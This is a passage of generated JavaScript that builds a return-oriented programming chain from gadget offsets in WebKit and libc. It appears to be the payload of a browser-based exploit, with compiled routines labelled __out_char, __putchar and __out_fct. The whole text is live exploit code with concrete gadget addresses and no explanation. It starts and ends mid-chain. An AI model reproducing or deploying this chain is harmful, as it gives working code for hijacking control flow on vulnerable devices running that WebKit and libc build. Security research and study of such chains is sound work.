//L2462:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2463:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2464:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2465:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+166336, //L2467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2467:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+166464, //L2469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+166480, //L2470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+166448, //L2468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2468:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2469:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2470:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+166568, //L2471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+166584, //L2473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2471:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2473:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2474:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+166704, //L2477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166688, //L2475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2475:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2477:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+166792, //L2478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+166808, //L2480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2478:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2480:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2481:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+166928, //L2484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166912, //L2482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2482:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2484:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+167016, //L2485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+167032, //L2487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2485:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2487:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2488:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+167152, //L2491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167136, //L2489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2489:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2491:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+167296, //L2494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167264, //L2492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+167280, //L2493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2492:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2493:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2494:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+167400, //L2495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+167416, //L2496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2495:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2496:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+167536, //L2497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+167520, //L2498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2498:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2497:
db([0, 0]); // 0x0
//__out_char:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+167608, //L2500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+167704, //L2501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167736, //L2504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2501:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2503:
db([24, 0]); // 0x18
set_gadget(webkit_base+568675,); //pop r8
//L2504:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+167840, //L2507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167824, //L2505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2505:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2507:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+167928, //L2508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+167944, //L2510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2508:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2510:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2511:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+168064, //L2514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168048, //L2512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2512:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2514:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+168152, //L2515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+168168, //L2517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2515:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2518:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+168288, //L2521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168272, //L2519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2519:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2521:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+168376, //L2522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+168392, //L2524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2522:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2524:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2525:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+168512, //L2528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168496, //L2526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2526:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2528:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+168672, //L2532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168640, //L2530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+168656, //L2531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2529:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2530:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2531:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2532:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+168728, //L2534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2534:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+168856, //L2536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+168872, //L2537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+168840, //L2535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2535:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2536:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2537:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+169032, //L2541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+169000, //L2539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+169016, //L2540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2538:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2539:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2540:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2541:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+169088, //L2543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2543:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+169216, //L2545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+169232, //L2546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+169200, //L2544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2544:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2545:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2546:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+169344, //L2548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+169392, //L2551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+169360, //L2549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2548:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2549:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2550:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2551:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+169504, //L2552+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+169496, //L2552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2552:
db([0, 0]); // 0x0
set_gadgets([
ropchain+169520, //L2552+24
ropchain+170728, //L2547
libc_base+764760, //pop rsi
ropchain+169560, //L2553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2553:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2555:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+169680, //L2558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+169664, //L2556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2556:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+169840, //L2562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+169808, //L2560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+169824, //L2561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2559:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2560:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2561:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+169896, //L2564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2564:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+170024, //L2566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170040, //L2567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170008, //L2565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2565:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2566:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2567:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+170200, //L2571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+170168, //L2569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170184, //L2570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2568:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2570:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2571:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+170256, //L2573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2573:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+170384, //L2575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170400, //L2576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170368, //L2574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2574:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2576:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+170480, //L2577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170496, //L2578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2577:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2578:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+170592, //L2580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170576, //L2579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2579:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2580:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2582:
ropchain+170696, //L2581
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+570904, //__putchar
//L2581:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L2547:
libc_base+764760, //pop rsi
ropchain+170808, //L2584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+170792, //L2583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2583:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2584:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+170912, //L2585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170928, //L2586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2585:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2586:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+171048, //L2587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+171032, //L2588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2588:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2587:
db([0, 0]); // 0x0
//__out_fct:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+171120, //L2590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2590:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+171216, //L2591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171248, //L2594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2593:
db([32, 0]); // 0x20
set_gadget(webkit_base+568675,); //pop r8
//L2594:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+171352, //L2597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171336, //L2595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2595:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2597:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+171440, //L2598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+171456, //L2600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2598:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2600:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2601:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+171576, //L2604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171560, //L2602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2602:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2604:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+171664, //L2605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+171680, //L2607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2605:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2607:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2608:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+171800, //L2611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171784, //L2609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2609:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+171960, //L2615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171928, //L2613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+171944, //L2614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2612:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2613:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2614:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2615:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+172016, //L2617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2617:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+172144, //L2619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+172160, //L2620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172128, //L2618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2618:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2619:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2620:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+172320, //L2624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+172288, //L2622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172304, //L2623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
